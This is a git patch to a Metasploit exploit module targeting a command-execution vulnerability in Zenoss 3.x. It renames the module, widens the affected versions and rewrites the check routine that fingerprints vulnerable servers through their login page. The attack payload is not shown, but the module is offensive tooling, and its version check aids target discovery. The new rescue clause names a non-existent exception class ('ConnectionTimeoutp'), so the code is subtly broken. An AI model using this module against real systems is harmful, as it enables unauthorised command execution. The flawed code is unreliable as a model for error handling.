From 2bf0899d09e6b4fd9401bc28929190485272cb2d Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Wed, 1 Aug 2012 20:15:45 +0930
Subject: [PATCH] minor improvements to Zenoss showdaemonxmlconfig exploit

---
 ....rb => zenoss_showdaemonxmlconfig_exec.rb} | 31 +++++++++++--------
 1 file changed, 18 insertions(+), 13 deletions(-)
 rename modules/exploits/linux/http/{zenoss_3.2.1_showdaemonxmlconfig_exec.rb => zenoss_showdaemonxmlconfig_exec.rb} (76%)

diff --git a/modules/exploits/linux/http/zenoss_3.2.1_showdaemonxmlconfig_exec.rb b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb
similarity index 76%
rename from modules/exploits/linux/http/zenoss_3.2.1_showdaemonxmlconfig_exec.rb
rename to modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb
index 443272deae..46228854f2 100644
--- a/modules/exploits/linux/http/zenoss_3.2.1_showdaemonxmlconfig_exec.rb
+++ b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb
@@ -6,7 +6,6 @@
 ##
 
 require 'msf/core'
-require 'msf/core/handler/reverse_tcp'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GoodRanking
@@ -15,9 +14,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Zenoss <= 3.2.1 showDaemonXMLConfig Command Execution',
+			'Name'           => 'Zenoss 3 showDaemonXMLConfig Command Execution',
 			'Description'    => %q{
-				This module exploits a command execution vulnerability in Zenoss <= 3.2.1
+				This module exploits a command execution vulnerability in Zenoss 3.x
 				which could be abused to allow authenticated users to execute arbitrary
 				code under the context of the 'zenoss' user. The show_daemon_xml_configs()
 				function in the 'ZenossInfo.py' script calls Popen() with user
@@ -31,10 +30,10 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'Author'         =>
 				[
-					'Brendan Coles <bcoles[at]gmail[dot]com>', # Discovery and exploit
+					'Brendan Coles <bcoles[at]gmail.com>', # Discovery and exploit
 				],
 			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision: 2 $',
+			'Version'        => '$Revision: 3 $',
 			'Privileged'     => false,
 			'Arch'           => ARCH_CMD,
 			'Platform'       => 'unix',
@@ -68,15 +67,21 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def check
 
+		@peer = "#{rhost}:#{rport}"
+
 		# retrieve software version from login page
-		res = send_request_raw({
-			'method' => "GET",
-			'uri'    => "/zport/acl_users/cookieAuthHelper/login_form"
-		})
-		return Exploit::CheckCode::Unknown    if res.nil?
-		return Exploit::CheckCode::Vulnerable if res.body =~ /<p>Copyright &copy; 2005-20[\d]{2} Zenoss, Inc\. \| Version\s+<span>3\.2\.1<\/span>/
-		return Exploit::CheckCode::Detected   if res.body =~ /<link rel="shortcut icon" type="image\/x\-icon" href="\/zport\/dmd\/favicon\.ico" \/>/
-		return Exploit::CheckCode::Safe
+		begin
+			res = send_request_raw({
+				'method' => "GET",
+				'uri'    => "/zport/acl_users/cookieAuthHelper/login_form"
+			})
+			return Exploit::CheckCode::Vulnerable if res.body =~ /<p>Copyright &copy; 2005-20[\d]{2} Zenoss, Inc\. \| Version\s+<span>3\./
+			return Exploit::CheckCode::Detected   if res.body =~ /<link rel="shortcut icon" type="image\/x\-icon" href="\/zport\/dmd\/favicon\.ico" \/>/
+			return Exploit::CheckCode::Safe
+		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp
+			print_error("#{@peer} - Connection failed")
+		end
+		return Exploit::CheckCode::Unknown
 
 	end